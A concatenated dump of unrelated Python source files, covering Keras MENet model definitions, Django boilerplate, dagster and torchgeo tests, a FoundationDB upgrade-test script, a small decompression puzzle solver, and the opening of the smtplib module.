get_menet(first_stage_channels=228, side_channels=12, groups=3, model_name="menet228_12x1_g3", **kwargs) def menet256_12x1_g4(**kwargs): """ 256-MENet-12x1 (g=4) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile Applications,' https://arxiv.org/abs/1803.09127. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.keras/models' Location for keeping the model parameters. """ return get_menet(first_stage_channels=256, side_channels=12, groups=4, model_name="menet256_12x1_g4", **kwargs) def menet348_12x1_g3(**kwargs): """ 348-MENet-12x1 (g=3) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile Applications,' https://arxiv.org/abs/1803.09127. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.keras/models' Location for keeping the model parameters. """ return get_menet(first_stage_channels=348, side_channels=12, groups=3, model_name="menet348_12x1_g3", **kwargs) def menet352_12x1_g8(**kwargs): """ 352-MENet-12x1 (g=8) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile Applications,' https://arxiv.org/abs/1803.09127. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.keras/models' Location for keeping the model parameters. """ return get_menet(first_stage_channels=352, side_channels=12, groups=8, model_name="menet352_12x1_g8", **kwargs) def menet456_24x1_g3(**kwargs): """ 456-MENet-24x1 (g=3) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile Applications,' https://arxiv.org/abs/1803.09127. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.keras/models' Location for keeping the model parameters. """ return get_menet(first_stage_channels=456, side_channels=24, groups=3, model_name="menet456_24x1_g3", **kwargs) def _test(): import numpy as np import keras pretrained = False models = [ menet108_8x1_g3, menet128_8x1_g4, menet160_8x1_g8, menet228_12x1_g3, menet256_12x1_g4, menet348_12x1_g3, menet352_12x1_g8, menet456_24x1_g3, ] for model in models: net = model(pretrained=pretrained) # net.summary() weight_count = keras.utils.layer_utils.count_params(net.trainable_weights) print("m={}, {}".format(model.__name__, weight_count)) assert (model != menet108_8x1_g3 or weight_count == 654516) assert (model != menet128_8x1_g4 or weight_count == 750796) assert (model != menet160_8x1_g8 or weight_count == 850120) assert (model != menet228_12x1_g3 or weight_count == 1806568) assert (model != menet256_12x1_g4 or weight_count == 1888240) assert (model != menet348_12x1_g3 or weight_count == 3368128) assert (model != menet352_12x1_g8 or weight_count == 2272872) assert (model != menet456_24x1_g3 or weight_count == 5304784) if is_channels_first(): x = np.zeros((1, 3, 224, 224), np.float32) else: x = np.zeros((1, 224, 224, 3), np.float32) y = net.predict(x) assert (y.shape == (1, 1000)) if __name__ == "__main__": _test()
py
7df9f95b0db10b0b7bf3297fe0cd9f9bde67ce3f
import sys, os from os.path import join def serializer_paths(project): return [ { 'template_path': join(os.path.abspath(sys.argv[0][:-12]), 'assets', 'templates', 'serializer', 'user_serializer'), 'filename': 'user_serializer.py', 'output_path': join(project.app_path, 'serializers') }, { 'template_path': join(os.path.abspath(sys.argv[0][:-12]), 'assets', 'templates', 'serializer', '__init__'), 'filename': '__init__.py', 'output_path': join(project.app_path, 'serializers') }, ]
py
7df9f9971878d82af25c79b486141c856292ac66
#!/usr/bin/env python """Django's command-line utility for administrative tasks.""" import os import sys def main(): os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'customers_api.settings') try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv) if __name__ == '__main__': main()
py
7df9f9c0a64f9d987029348d1965704c59ee1dfa
import pickle from dagster_dbt import DbtCliOutput from ..test_types import DBT_RESULT_DICT class TestDbtCliOutput: def test_init(self): dco = DbtCliOutput( command="dbt run", return_code=0, raw_output="The raw output (stdout).", result=DBT_RESULT_DICT, logs=[], ) assert len(dco.result["results"]) == len(DBT_RESULT_DICT["results"]) def test_pickle_roundtrip(self): # pylint: disable=unused-argument dco = DbtCliOutput( command="dbt run", return_code=0, raw_output="The raw output (stdout).", result=DBT_RESULT_DICT, logs=[{"some": {"nested": {"logs"}}}, {"other": "log"}], ) assert vars(pickle.loads(pickle.dumps(dco))) == vars(dco)
py
7df9fa00a95fbd32bce946fcc979c824bf312bab
#!/usr/bin/env python # Copyright 2018 Division of Medical Image Computing, German Cancer Research Center (DKFZ). # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Default Configurations script. Avoids changing configs of all experiments if general settings are to be changed.""" import os class DefaultConfigs: def __init__(self, model, server_env=None, dim=2): self.server_env = server_env ######################### # I/O # ######################### self.model = model self.dim = dim # int [0 < dataset_size]. select n patients from dataset for prototyping. self.select_prototype_subset = None # some default paths. self.backbone_path = 'models/backbone.py' self.source_dir = os.path.dirname(os.path.realpath(__file__)) #current dir. self.input_df_name = 'info_df.pickle' self.model_path = 'models/{}.py'.format(self.model) if server_env: self.source_dir = '/home/jaegerp/code/mamma_code/medicaldetectiontoolkit' ######################### # Data Loader # ######################### #random seed for fold_generator and batch_generator. self.seed = 0 #number of threads for multithreaded batch generation. self.n_workers = 2 # if True, segmentation losses learn all categories, else only foreground vs. background. self.class_specific_seg_flag = False ######################### # Architecture # ######################### self.weight_decay = 0.0 # nonlinearity to be applied after convs with nonlinearity. one of 'relu' or 'leaky_relu' self.relu = 'relu' # if True initializes weights as specified in model script. else use default Pytorch init. self.custom_init = False # if True adds high-res decoder levels to feature pyramid: P1 + P0. (e.g. set to true in retina_unet configs) self.operate_stride1 = False ######################### # Schedule # ######################### # number of folds in cross validation. self.n_cv_splits = 5 # number of probabilistic samples in validation. self.n_probabilistic_samples = None ######################### # Testing / Plotting # ######################### # perform mirroring at test time. (only XY. Z not done to not blow up predictions times). self.test_aug = True # if True, test data lies in a separate folder and is not part of the cross validation. self.hold_out_test_set = False # if hold_out_test_set provided, ensemble predictions over models of all trained cv-folds. self.ensemble_folds = False # color specifications for all box_types in prediction_plot. self.box_color_palette = {'det': 'b', 'gt': 'r', 'neg_class': 'purple', 'prop': 'w', 'pos_class': 'g', 'pos_anchor': 'c', 'neg_anchor': 'c'} # scan over confidence score in evaluation to optimize it on the validation set. self.scan_det_thresh = False # plots roc-curves / prc-curves in evaluation. self.plot_stat_curves = False # evaluates average precision per image and averages over images. instead computing one ap over data set. self.per_patient_ap = False # threshold for clustering 2D box predictions to 3D Cubes. Overlap is computed in XY. self.merge_3D_iou = 0.1 # monitor any value from training. self.n_monitoring_figures = 1 # dict to assign specific plot_values to monitor_figures > 0. {1: ['class_loss'], 2: ['kl_loss', 'kl_sigmas']} self.assign_values_to_extra_figure = {} # save predictions to csv file in experiment dir. self.save_preds_to_csv = True # select a maximum number of patient cases to test. number or "all" for all self.max_test_patients = "all" ######################### # MRCNN # ######################### # if True, mask loss is not applied. used for data sets, where no pixel-wise annotations are provided. self.frcnn_mode = False # if True, unmolds masks in Mask R-CNN to full-res for plotting/monitoring. self.return_masks_in_val = False self.return_masks_in_test = False # needed if doing instance segmentation. evaluation not yet implemented. # add P6 to Feature Pyramid Network. self.sixth_pooling = False # for probabilistic detection self.n_latent_dims = 0
py
7df9fa402263361b5e690dc6d900fd16b67aa4c6
#!/usr/bin/env python # Copyright 2018, Kay Hayen, mailto:[email protected] # # Part of "Nuitka", an optimizing Python compiler that is compatible and # integrates with CPython, but also works on its own. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """ Launcher for doc/code sync release tool. """ import os import sys # Unchanged, running from checkout, use the parent directory, the nuitka # package ought be there. sys.path.insert( 0, os.path.normpath( os.path.join( os.path.dirname(__file__), "..", ) ) ) from nuitka.tools.release.sync_doc.__main__ import main # isort:skip main()
py
7df9fba717fe4e2fa76c572bdfcbea4b4833f080
values = [ random.normalvariate(1, 0.5) for i in range(1000)] quick_check(values) (0.990099111944864, 0.5029847005836282)
py
7df9fdacc389093f92f7c6600219d4dc77fa72fd
#!/usr/bin/env python3 from argparse import ArgumentParser, RawDescriptionHelpFormatter import glob import os from pathlib import Path import platform import random import shutil import stat import subprocess import sys from threading import Thread, Event import traceback import time from urllib import request import hashlib from local_cluster import LocalCluster, random_secret_string SUPPORTED_PLATFORMS = ["x86_64"] SUPPORTED_VERSIONS = [ "7.2.0", "7.1.3", "7.1.2", "7.1.1", "7.1.0", "7.0.0", "6.3.24", "6.3.23", "6.3.22", "6.3.18", "6.3.17", "6.3.16", "6.3.15", "6.3.13", "6.3.12", "6.3.9", "6.2.30", "6.2.29", "6.2.28", "6.2.27", "6.2.26", "6.2.25", "6.2.24", "6.2.23", "6.2.22", "6.2.21", "6.2.20", "6.2.19", "6.2.18", "6.2.17", "6.2.16", "6.2.15", "6.2.10", "6.1.13", "6.1.12", "6.1.11", "6.1.10", "6.0.18", "6.0.17", "6.0.16", "6.0.15", "6.0.14", "5.2.8", "5.2.7", "5.1.7", "5.1.6", ] CLUSTER_ACTIONS = ["wiggle"] FDB_DOWNLOAD_ROOT = "https://github.com/apple/foundationdb/releases/download/" LOCAL_OLD_BINARY_REPO = "/opt/foundationdb/old/" CURRENT_VERSION = "7.2.0" HEALTH_CHECK_TIMEOUT_SEC = 5 PROGRESS_CHECK_TIMEOUT_SEC = 30 TESTER_STATS_INTERVAL_SEC = 5 TRANSACTION_RETRY_LIMIT = 100 MAX_DOWNLOAD_ATTEMPTS = 5 RUN_WITH_GDB = False def make_executable_path(path): st = os.stat(path) os.chmod(path, st.st_mode | stat.S_IEXEC) def remove_file_no_fail(filename): try: os.remove(filename) except OSError: pass def version_from_str(ver_str): ver = [int(s) for s in ver_str.split(".")] assert len(ver) == 3, "Invalid version string {}".format(ver_str) return ver def api_version_from_str(ver_str): ver_tuple = version_from_str(ver_str) return ver_tuple[0] * 100 + ver_tuple[1] * 10 def version_before(ver_str1, ver_str2): return version_from_str(ver_str1) < version_from_str(ver_str2) def random_sleep(min_sec, max_sec): time_sec = random.uniform(min_sec, max_sec) print("Sleeping for {0:.3f}s".format(time_sec)) time.sleep(time_sec) def compute_sha256(filename): hash_function = hashlib.sha256() with open(filename, "rb") as f: while True: data = f.read(128 * 1024) if not data: break hash_function.update(data) return hash_function.hexdigest() def read_to_str(filename): with open(filename, "r") as f: return f.read() class UpgradeTest: def __init__( self, args ): self.build_dir = Path(args.build_dir).resolve() assert self.build_dir.exists(), "{} does not exist".format(args.build_dir) assert self.build_dir.is_dir(), "{} is not a directory".format(args.build_dir) self.upgrade_path = args.upgrade_path self.used_versions = set(self.upgrade_path).difference(set(CLUSTER_ACTIONS)) for version in self.used_versions: assert version in SUPPORTED_VERSIONS, "Unsupported version or cluster action {}".format(version) self.platform = platform.machine() assert self.platform in SUPPORTED_PLATFORMS, "Unsupported platform {}".format( self.platform ) self.tmp_dir = self.build_dir.joinpath("tmp", random_secret_string(16)) self.tmp_dir.mkdir(parents=True) self.download_dir = self.build_dir.joinpath("tmp", "old_binaries") self.local_binary_repo = Path(LOCAL_OLD_BINARY_REPO) if not self.local_binary_repo.exists(): self.local_binary_repo = None self.download_old_binaries() self.create_external_lib_dir() init_version = self.upgrade_path[0] self.cluster = LocalCluster( self.tmp_dir, self.binary_path(init_version, "fdbserver"), self.binary_path(init_version, "fdbmonitor"), self.binary_path(init_version, "fdbcli"), args.process_number, create_config=False, redundancy=args.redundancy ) self.cluster.create_cluster_file() self.configure_version(init_version) self.log = self.cluster.log self.etc = self.cluster.etc self.data = self.cluster.data self.input_pipe_path = self.tmp_dir.joinpath( "input.{}".format(random_secret_string(8)) ) self.output_pipe_path = self.tmp_dir.joinpath( "output.{}".format(random_secret_string(8)) ) os.mkfifo(self.input_pipe_path) os.mkfifo(self.output_pipe_path) self.progress_event = Event() self.api_version = None self.tester_retcode = None self.tester_proc = None self.output_pipe = None self.tester_bin = None self.ctrl_pipe = None # Check if the binaries for the given version are available in the local old binaries repository def version_in_local_repo(self, version): return (self.local_binary_repo is not None) and (self.local_binary_repo.joinpath(version).exists()) def binary_path(self, version, bin_name): if version == CURRENT_VERSION: return self.build_dir.joinpath("bin", bin_name) elif self.version_in_local_repo(version): return self.local_binary_repo.joinpath(version, "bin", "{}-{}".format(bin_name, version)) else: return self.download_dir.joinpath(version, bin_name) def lib_dir(self, version): if version == CURRENT_VERSION: return self.build_dir.joinpath("lib") else: return self.download_dir.joinpath(version) # Download an old binary of a given version from a remote repository def download_old_binary( self, version, target_bin_name, remote_bin_name, make_executable ): local_file = self.download_dir.joinpath(version, target_bin_name) if local_file.exists(): return # Download to a temporary file and then replace the target file atomically # to avoid consistency errors in case of multiple tests are downloading the # same file in parallel local_file_tmp = Path("{}.{}".format(str(local_file), random_secret_string(8))) self.download_dir.joinpath(version).mkdir(parents=True, exist_ok=True) remote_file = "{}{}/{}".format(FDB_DOWNLOAD_ROOT, version, remote_bin_name) remote_sha256 = "{}.sha256".format(remote_file) local_sha256 = Path("{}.sha256".format(local_file_tmp)) for attempt_cnt in range(MAX_DOWNLOAD_ATTEMPTS + 1): if attempt_cnt == MAX_DOWNLOAD_ATTEMPTS: assert False, "Failed to download {} after {} attempts".format( local_file_tmp, MAX_DOWNLOAD_ATTEMPTS ) try: print("Downloading '{}' to '{}'...".format(remote_file, local_file_tmp)) request.urlretrieve(remote_file, local_file_tmp) print("Downloading '{}' to '{}'...".format(remote_sha256, local_sha256)) request.urlretrieve(remote_sha256, local_sha256) print("Download complete") except Exception as e: print("Retrying on error:", e) continue assert local_file_tmp.exists(), "{} does not exist".format(local_file_tmp) assert local_sha256.exists(), "{} does not exist".format(local_sha256) expected_checksum = read_to_str(local_sha256) actual_checkum = compute_sha256(local_file_tmp) if expected_checksum == actual_checkum: print("Checksum OK") break print( "Checksum mismatch. Expected: {} Actual: {}".format( expected_checksum, actual_checkum ) ) os.rename(local_file_tmp, local_file) os.remove(local_sha256) if make_executable: make_executable_path(local_file) # Copy a client library file from the local old binaries repository # The file needs to be renamed to libfdb_c.so, because it is loaded with this name by fdbcli def copy_clientlib_from_local_repo(self, version): dest_lib_file = self.download_dir.joinpath(version, "libfdb_c.so") if dest_lib_file.exists(): return # Avoid race conditions in case of parallel test execution by first copying to a temporary file # and then renaming it atomically dest_file_tmp = Path("{}.{}".format(str(dest_lib_file), random_secret_string(8))) src_lib_file = self.local_binary_repo.joinpath(version, "lib", "libfdb_c-{}.so".format(version)) assert src_lib_file.exists(), "Missing file {} in the local old binaries repository".format(src_lib_file) self.download_dir.joinpath(version).mkdir(parents=True, exist_ok=True) shutil.copyfile(src_lib_file, dest_file_tmp) os.rename(dest_file_tmp, dest_lib_file) assert dest_lib_file.exists(), "{} does not exist".format(dest_lib_file) # Download all old binaries required for testing the specified upgrade path def download_old_binaries(self): for version in self.used_versions: if version == CURRENT_VERSION: continue if self.version_in_local_repo(version): self.copy_clientlib_from_local_repo(version) continue self.download_old_binary( version, "fdbserver", "fdbserver.{}".format(self.platform), True ) self.download_old_binary( version, "fdbmonitor", "fdbmonitor.{}".format(self.platform), True ) self.download_old_binary( version, "fdbcli", "fdbcli.{}".format(self.platform), True ) self.download_old_binary( version, "libfdb_c.so", "libfdb_c.{}.so".format(self.platform), False ) # Create a directory for external client libraries for MVC and fill it # with the libraries necessary for the specified upgrade path def create_external_lib_dir(self): self.external_lib_dir = self.tmp_dir.joinpath("client_libs") self.external_lib_dir.mkdir(parents=True) for version in self.used_versions: src_file_path = self.lib_dir(version).joinpath("libfdb_c.so") assert src_file_path.exists(), "{} does not exist".format(src_file_path) target_file_path = self.external_lib_dir.joinpath( "libfdb_c.{}.so".format(version) ) shutil.copyfile(src_file_path, target_file_path) # Perform a health check of the cluster: Use fdbcli status command to check if the number of # server processes and their versions are as expected def health_check(self, timeout_sec=HEALTH_CHECK_TIMEOUT_SEC): retries = 0 while retries < timeout_sec: retries += 1 status = self.cluster.get_status() if "processes" not in status["cluster"]: print("Health check: no processes found. Retrying") time.sleep(1) continue num_proc = len(status["cluster"]["processes"]) if num_proc != self.cluster.process_number: print( "Health check: {} of {} processes found. Retrying".format( num_proc, self.cluster.process_number ) ) time.sleep(1) continue for (_, proc_stat) in status["cluster"]["processes"].items(): proc_ver = proc_stat["version"] assert ( proc_ver == self.cluster_version ), "Process version: expected: {}, actual: {}".format( self.cluster_version, proc_ver ) print("Health check: OK") return assert False, "Health check: Failed" # Create and save a cluster configuration for the given version def configure_version(self, version): self.cluster.fdbmonitor_binary = self.binary_path(version, "fdbmonitor") self.cluster.fdbserver_binary = self.binary_path(version, "fdbserver") self.cluster.fdbcli_binary = self.binary_path(version, "fdbcli") self.cluster.set_env_var = "LD_LIBRARY_PATH", self.lib_dir(version) if version_before(version, "7.1.0"): self.cluster.use_legacy_conf_syntax = True self.cluster.save_config() self.cluster_version = version # Upgrade the cluster to the given version def upgrade_to(self, version): print("Upgrading to version {}".format(version)) self.cluster.stop_cluster() self.configure_version(version) self.cluster.ensure_ports_released() self.cluster.start_cluster() print("Upgraded to {}".format(version)) def __enter__(self): print("Starting cluster version {}".format(self.cluster_version)) self.cluster.start_cluster() self.cluster.create_database(enable_tenants=False) return self def __exit__(self, xc_type, exc_value, traceback): self.cluster.stop_cluster() shutil.rmtree(self.tmp_dir) # Determine FDB API version matching the upgrade path def determine_api_version(self): self.api_version = api_version_from_str(CURRENT_VERSION) for version in self.used_versions: self.api_version = min(api_version_from_str(version), self.api_version) # Start the tester to generate the workload specified by the test file def exec_workload(self, test_file): self.tester_retcode = 1 try: self.determine_api_version() cmd_args = [ self.tester_bin, "--cluster-file", self.cluster.cluster_file, "--test-file", test_file, "--external-client-dir", self.external_lib_dir, "--disable-local-client", "--input-pipe", self.input_pipe_path, "--output-pipe", self.output_pipe_path, "--api-version", str(self.api_version), "--log", "--log-dir", self.log, "--tmp-dir", self.tmp_dir, "--transaction-retry-limit", str(TRANSACTION_RETRY_LIMIT), "--stats-interval", str(TESTER_STATS_INTERVAL_SEC*1000) ] if RUN_WITH_GDB: cmd_args = ["gdb", "-ex", "run", "--args"] + cmd_args print( "Executing test command: {}".format( " ".join([str(c) for c in cmd_args]) ) ) self.tester_proc = subprocess.Popen( cmd_args, stdout=sys.stdout, stderr=sys.stderr ) self.tester_retcode = self.tester_proc.wait() self.tester_proc = None if self.tester_retcode != 0: print("Tester failed with return code {}".format(self.tester_retcode)) except Exception: print("Execution of test workload failed") print(traceback.format_exc()) finally: # If the tester failed to initialize, other threads of the test may stay # blocked on trying to open the named pipes if self.ctrl_pipe is None or self.output_pipe is None: print("Tester failed before initializing named pipes. Aborting the test") os._exit(1) # Perform a progress check: Trigger it and wait until it is completed def progress_check(self): self.progress_event.clear() os.write(self.ctrl_pipe, b"CHECK\n") self.progress_event.wait(None if RUN_WITH_GDB else PROGRESS_CHECK_TIMEOUT_SEC) if self.progress_event.is_set(): print("Progress check: OK") else: assert False, "Progress check failed after upgrade to version {}".format( self.cluster_version ) # The main function of a thread for reading and processing # the notifications received from the tester def output_pipe_reader(self): try: print("Opening pipe {} for reading".format(self.output_pipe_path)) self.output_pipe = open(self.output_pipe_path, "r") for line in self.output_pipe: msg = line.strip() print("Received {}".format(msg)) if msg == "CHECK_OK": self.progress_event.set() self.output_pipe.close() except Exception as e: print("Error while reading output pipe", e) print(traceback.format_exc()) # Execute the upgrade test workflow according to the specified # upgrade path: perform the upgrade steps and check success after each step def exec_upgrade_test(self): print("Opening pipe {} for writing".format(self.input_pipe_path)) self.ctrl_pipe = os.open(self.input_pipe_path, os.O_WRONLY) try: self.health_check() self.progress_check() random_sleep(0.0, 2.0) for entry in self.upgrade_path[1:]: if entry == "wiggle": self.cluster.cluster_wiggle() else: assert entry in self.used_versions, "Unexpected entry in the upgrade path: {}".format(entry) self.upgrade_to(entry) self.health_check() self.progress_check() os.write(self.ctrl_pipe, b"STOP\n") finally: os.close(self.ctrl_pipe) # Kill the tester process if it is still alive def kill_tester_if_alive(self, workload_thread): if not workload_thread.is_alive(): return if self.tester_proc is not None: try: print("Killing the tester process") self.tester_proc.kill() workload_thread.join(5) except Exception: print("Failed to kill the tester process") # The main method implementing the test: # - Start a thread for generating the workload using a tester binary # - Start a thread for reading notifications from the tester # - Trigger the upgrade steps and checks in the main thread def exec_test(self, args): self.tester_bin = self.build_dir.joinpath("bin", "fdb_c_api_tester") assert self.tester_bin.exists(), "{} does not exist".format(self.tester_bin) self.tester_proc = None test_retcode = 1 try: workload_thread = Thread(target=self.exec_workload, args=(args.test_file,)) workload_thread.start() reader_thread = Thread(target=self.output_pipe_reader) reader_thread.start() self.exec_upgrade_test() test_retcode = 0 except Exception: print("Upgrade test failed") print(traceback.format_exc()) self.kill_tester_if_alive(workload_thread) finally: workload_thread.join(5) reader_thread.join(5) self.kill_tester_if_alive(workload_thread) if test_retcode == 0: test_retcode = self.tester_retcode return test_retcode def grep_logs_for_events(self, severity): return ( subprocess.getoutput( "grep -r 'Severity=\"{}\"' {}".format( severity, self.cluster.log.as_posix() ) ) .rstrip() .splitlines() ) # Check the cluster log for errors def check_cluster_logs(self, error_limit=100): sev40s = ( subprocess.getoutput( "grep -r 'Severity=\"40\"' {}".format(self.cluster.log.as_posix()) ) .rstrip() .splitlines() ) err_cnt = 0 for line in sev40s: # When running ASAN we expect to see this message. Boost coroutine should be using the # correct asan annotations so that it shouldn't produce any false positives. if line.endswith( "WARNING: ASan doesn't fully support makecontext/swapcontext functions and may produce false " "positives in some cases! " ): continue if err_cnt < error_limit: print(line) err_cnt += 1 if err_cnt > 0: print( ">>>>>>>>>>>>>>>>>>>> Found {} severity 40 events - the test fails", err_cnt, ) else: print("No errors found in logs") return err_cnt == 0 # Check the server and client logs for warnings and dump them def dump_warnings_in_logs(self, limit=100): sev30s = ( subprocess.getoutput( "grep -r 'Severity=\"30\"' {}".format(self.cluster.log.as_posix()) ) .rstrip() .splitlines() ) if len(sev30s) == 0: print("No warnings found in logs") else: print( ">>>>>>>>>>>>>>>>>>>> Found {} severity 30 events (warnings):".format( len(sev30s) ) ) for line in sev30s[:limit]: print(line) # Dump the last cluster configuration and cluster logs def dump_cluster_logs(self): for etc_file in glob.glob(os.path.join(self.cluster.etc, "*")): print(">>>>>>>>>>>>>>>>>>>> Contents of {}:".format(etc_file)) with open(etc_file, "r") as f: print(f.read()) for log_file in glob.glob(os.path.join(self.cluster.log, "*")): print(">>>>>>>>>>>>>>>>>>>> Contents of {}:".format(log_file)) with open(log_file, "r") as f: print(f.read()) if __name__ == "__main__": parser = ArgumentParser( formatter_class=RawDescriptionHelpFormatter, description=""" A script for testing FDB multi-version client in upgrade scenarios. Creates a local cluster, generates a workload using fdb_c_api_tester with a specified test file, and performs cluster upgrade according to the specified upgrade path. Checks if the workload successfully progresses after each upgrade step. """, ) parser.add_argument( "--build-dir", "-b", metavar="BUILD_DIRECTORY", help="FDB build directory", required=True, ) parser.add_argument( "--upgrade-path", nargs="+", help="Cluster upgrade path: a space separated list of versions.\n" + "The list may also contain cluster change actions: {}".format(CLUSTER_ACTIONS), default=[CURRENT_VERSION], ) parser.add_argument( "--test-file", help="A .toml file describing a test workload to be generated with fdb_c_api_tester", required=True, ) parser.add_argument( "--process-number", "-p", help="Number of fdb processes running (default: 0 - random)", type=int, default=0, ) parser.add_argument( "--redundancy", help="Database redundancy level (default: single)", type=str, default="single", ) parser.add_argument( "--disable-log-dump", help="Do not dump cluster log on error", action="store_true", ) parser.add_argument( "--run-with-gdb", help="Execute the tester binary from gdb", action="store_true" ) args = parser.parse_args() if args.process_number == 0: args.process_number = random.randint(1, 5) print("Testing with {} processes".format(args.process_number)) assert len(args.upgrade_path) > 0, "Upgrade path must be specified" assert args.upgrade_path[0] in SUPPORTED_VERSIONS, "Upgrade path begin with a valid version number" if args.run_with_gdb: RUN_WITH_GDB = True errcode = 1 with UpgradeTest(args) as test: print("log-dir: {}".format(test.log)) print("etc-dir: {}".format(test.etc)) print("data-dir: {}".format(test.data)) print("cluster-file: {}".format(test.etc.joinpath("fdb.cluster"))) errcode = test.exec_test(args) if not test.check_cluster_logs(): errcode = 1 if errcode == 0 else errcode test.dump_warnings_in_logs() if errcode != 0 and not args.disable_log_dump: test.dump_cluster_logs() sys.exit(errcode)
py
7df9fdc12df4ea883f021b36554cd6acfffc41e2
from django.conf.urls import url from rest_framework.routers import SimpleRouter from django.urls import path from rest_framework.routers import DefaultRouter from . import views class OptionalSlashRouter(SimpleRouter): def __init__(self, trailing_slash='/?'): self.trailing_slash = trailing_slash super(SimpleRouter, self).__init__() router = OptionalSlashRouter() urlpatterns = [ ] router = DefaultRouter() router.register(r'uploads', views.UploadViewSet, basename='uploads') urlpatterns += router.urls
py
7df9fe5dd2bb23a73fa87487b1777d1668a266b2
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. import builtins import os from pathlib import Path from typing import Any, Generator import matplotlib.pyplot as plt import pytest import torch import torch.nn as nn from _pytest.fixtures import SubRequest from _pytest.monkeypatch import MonkeyPatch from torchgeo.datasets import So2Sat pytest.importorskip("h5py") class TestSo2Sat: @pytest.fixture(params=["train", "validation", "test"]) def dataset( self, monkeypatch: Generator[MonkeyPatch, None, None], request: SubRequest ) -> So2Sat: md5s = { "train": "2fa6b9d8995e3b6272af42719f05aaa2", "validation": "fe3dbf74971766d5038f6cbc0b1390ae", "test": "87d428eff44267ca642fc739cc442331", } monkeypatch.setattr(So2Sat, "md5s", md5s) # type: ignore[attr-defined] root = os.path.join("tests", "data", "so2sat") split = request.param transforms = nn.Identity() # type: ignore[attr-defined] return So2Sat(root, split, transforms, checksum=True) @pytest.fixture def mock_missing_module( self, monkeypatch: Generator[MonkeyPatch, None, None] ) -> None: import_orig = builtins.__import__ def mocked_import(name: str, *args: Any, **kwargs: Any) -> Any: if name == "h5py": raise ImportError() return import_orig(name, *args, **kwargs) monkeypatch.setattr( # type: ignore[attr-defined] builtins, "__import__", mocked_import ) def test_getitem(self, dataset: So2Sat) -> None: x = dataset[0] assert isinstance(x, dict) assert isinstance(x["image"], torch.Tensor) assert isinstance(x["label"], torch.Tensor) def test_len(self, dataset: So2Sat) -> None: assert len(dataset) == 10 def test_out_of_bounds(self, dataset: So2Sat) -> None: # h5py at version 2.10.0 raises a ValueError instead of an IndexError so we # check for both here with pytest.raises((IndexError, ValueError)): dataset[10] def test_invalid_split(self) -> None: with pytest.raises(AssertionError): So2Sat(split="foo") def test_not_downloaded(self, tmp_path: Path) -> None: with pytest.raises(RuntimeError, match="Dataset not found or corrupted."): So2Sat(str(tmp_path)) def test_plot(self, dataset: So2Sat) -> None: x = dataset[0].copy() dataset.plot(x, suptitle="Test") plt.close() dataset.plot(x, show_titles=False) plt.close() x["prediction"] = x["label"].clone() dataset.plot(x) plt.close() def test_mock_missing_module( self, dataset: So2Sat, mock_missing_module: None ) -> None: with pytest.raises( ImportError, match="h5py is not installed and is required to use this dataset", ): So2Sat(dataset.root)
py
7df9fe87f6a468143b3189dc1bf5675d3e087c96
#!/usrbin/python3 def decompressSize(compressed, recurse): index = 0 size = 0 while "(" in compressed[index:]: markerLoc = compressed[index:].find("(") closeLoc = compressed[index:].find(")") size += markerLoc marker = compressed[(index+markerLoc+1):(index+closeLoc)] markerString = "".join(marker) splitMarker = markerString.split("x") length = int(splitMarker[0]) multiplier = int(splitMarker[1]) substring = compressed[(index+closeLoc+1):(index+closeLoc+1+length)] if recurse and "(" in substring: substringSize = decompressSize(substring, recurse) else: substringSize = len(substring) size += (substringSize * multiplier) index += closeLoc + 1 + length size += len(compressed[index:]) return size raw = input("? ") print decompressSize(raw, False) print decompressSize(raw, True)
py
7df9ff4ee510b2c6446b3b7ab49c2afdf782904a
#! /usr/bin/env python3 '''SMTP/ESMTP client class. This should follow RFC 821 (SMTP), RFC 1869 (ESMTP), RFC 2554 (SMTP Authentication) and RFC 2487 (Secure SMTP over TLS). Notes: Please remember, when doing ESMTP, that the names of the SMTP service extensions are NOT the same thing as the option keywords for the RCPT and MAIL commands! Example: >>> import smtplib >>> s=smtplib.SMTP("localhost") >>> print(s.help()) This is Sendmail version 8.8.4 Topics: HELO EHLO MAIL RCPT DATA RSET NOOP QUIT HELP VRFY EXPN VERB ETRN DSN For more info use "HELP <topic>". To report bugs in the implementation send email to [email protected]. For local information send email to Postmaster at your site. End of HELP info >>> s.putcmd("vrfy","someone@here") >>> s.getreply() (250, "Somebody OverHere <[email protected]>") >>> s.quit() ''' # Author: The Dragon De Monsyne <[email protected]> # ESMTP support, test code and doc fixes added by # Eric S. Raymond <[email protected]> # Better RFC 821 compliance (MAIL and RCPT, and CRLF in data) # by Carey Evans <[email protected]>, for picky mail servers. # RFC 2554 (authentication) support by Gerhard Haering <[email protected]>. # # This was modified from the Python 1.5 library HTTP lib. import socket import io import re import email.utils import email.message import email.generator import base64 import hmac import copy import datetime import sys from email.base64mime import body_encode as encode_base64 __all__ = ["SMTPException", "SMTPServerDisconnected", "SMTPResponseException", "SMTPSenderRefused", "SMTPRecipientsRefused", "SMTPDataError", "SMTPConnectError", "SMTPHeloError", "SMTPAuthenticationError", "quoteaddr", "quotedata", "SMTP"] SMTP_PORT = 25 SMTP_SSL_PORT = 465 CRLF = 